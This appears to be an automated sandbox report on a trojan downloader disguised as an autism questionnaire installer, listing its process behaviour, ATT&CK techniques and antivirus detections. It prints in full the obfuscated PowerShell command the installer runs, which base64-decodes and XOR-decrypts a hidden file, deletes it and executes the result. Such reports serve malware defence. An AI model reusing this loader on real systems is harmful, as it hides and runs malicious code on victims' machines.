            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6992 Thread sleep count: 5626 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280 Thread sleep count: 33 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6988 Thread sleep count: 1533 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504 Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320 Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7204 Thread sleep count: 4906 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7560 Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196 Thread sleep count: 299 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep count: 4106 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528 Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7016 Thread sleep count: 312 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284 Thread sleep count: 3994 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7568 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272 Thread sleep count: 162 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7376 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5931
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1629
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5626
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1533
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2708
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4906
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4106
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3994
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Check user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-20151
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Code function: 0_2_004AF91C GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_004AF91C
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Code function: 0_2_0040AEF4 FindFirstFileW,FindClose,0_2_0040AEF4
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Code function: 0_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_0040A928
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: 3_2_0060C2B0 FindFirstFileW,GetLastError,3_2_0060C2B0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: 3_2_0040E6A0 FindFirstFileW,FindClose,3_2_0040E6A0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: 3_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,3_2_0040E0D4
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: 3_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,3_2_006B8DE4
            Source: powershell.exe, 0000000C.00000002.460628955.0000000004FCB000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.456184997.0000000005C9D000.00000004.00000001.sdmp Binary or memory string: Hyper-V
            Source: powershell.exe, 0000000C.00000002.460628955.0000000004FCB000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.457902376.0000000004A40000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.453141956.0000000005710000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.456184997.0000000005C9D000.00000004.00000001.sdmp Binary or memory string: Oh:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion:

            Yara detected Powershell dedcode and execute
            Source: Yara match File source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.4ujEuSR7.20211211144038.txt, type: DROPPED
            Source: Yara match File source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.zcmp3+HP.20211211144037.txt, type: DROPPED
            Source: Yara match File source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.dw4EHDML.20211211144038.txt, type: DROPPED
            Source: Yara match File source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.q4FgjTZQ.20211211144035.txt, type: DROPPED
            Source: Yara match File source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.O+ospPLn.20211211144035.txt, type: DROPPED
            Source: Yara match File source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.SX01lhy_.20211211144040.txt, type: DROPPED
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: 3_2_006A60E8 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 3_2_006A60E8
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: 3_2_005C8B3C InitializeSecurityDescriptor,SetSecurityDescriptorDacl, 3_2_005C8B3C
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: 3_2_005C7CE0 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 3_2_005C7CE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW,0_2_0040B044
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Code function: GetLocaleInfoW,0_2_0041E034
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Code function: GetLocaleInfoW,0_2_0041E080
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Code function: GetLocaleInfoW,0_2_004AF218
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0040A4CC
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: GetUserDefaultUILanguage,GetLocaleInfoW,3_2_0040E7F0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: GetLocaleInfoW,3_2_006103F8
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_0040DC78
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Code function: 0_2_00405AE0 cpuid 0_2_00405AE0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp Code function: 3_2_00625754 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,3_2_00625754
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Code function: 0_2_0041C3D8 GetLocalTime,0_2_0041C3D8
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe Code function: 0_2_004B5114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,0_2_004B5114

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Command and Scripting Interpreter 112 | Registry Run Keys / Startup Folder 1 | Exploitation for Privilege Escalation 1 | Masquerading 11 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
            Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Access Token Manipulation 1 | Virtualization/Sandbox Evasion 21 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | PowerShell 2 | Logon Script (Windows) | Process Injection 12 | Access Token Manipulation 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 1 | Process Injection 12 | NTDS | Virtualization/Sandbox Evasion 21 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 11 | LSA Secrets | Application Window Discovery 11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | System Owner/User Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 35 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            [Behavior graph image not preserved. Behavior Graph ID: 538201; Sample: Girls-Questionnaire-For-Aut...; Startdate: 11/12/2021; Architecture: WINDOWS; Score: 100]
            Process chain shown in the graph: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe started Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, which started several powershell.exe instances and 4 other processes; these led to RdrCEF.exe, AcroRd32.exe and 3 other processes.
            Signatures attached to graph nodes: Antivirus / Scanner detection for submitted sample; Icon mismatch, binary includes an icon from a different legit application in order to fool users; Multi AV Scanner detection for submitted file; Obfuscated command line found; Suspicious powershell command line found; Writes many files with high entropy; Powershell creates an autostart link.

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label | Link
            Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe | 36% | Virustotal | | Browse
            Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe | 20% | Metadefender | | Browse
            Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe | 36% | ReversingLabs | Win32.Trojan.PsDownload |
            Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe | 100% | Avira | TR/Dldr.Agent.wqtsr |

            Dropped Files

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll | 0% | Virustotal | | Browse
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll | 0% | Metadefender | | Browse
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmp | 0% | Virustotal | | Browse
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmp | 0% | Metadefender | | Browse
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp | 0% | Metadefender | | Browse
            C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp | 9% | ReversingLabs | |

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label | Link
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
            http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
            http://crl.microsoft | 0% | URL Reputation | safe |
            https://www.remobjects.com/ps | 0% | URL Reputation | safe |
            http://crl.microsof | 0% | URL Reputation | safe |
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
            http://subca.ocsp-certum.com01 | 0% | URL Reputation | safe |
            https://www.innosetup.com/ | 0% | URL Reputation | safe |
            https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
            https://jrsoftware.org0 | 0% | Avira URL Cloud | safe |
            http://cscasha2.ocsp-certum.com04 | 0% | URL Reputation | safe |

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe | false | | high
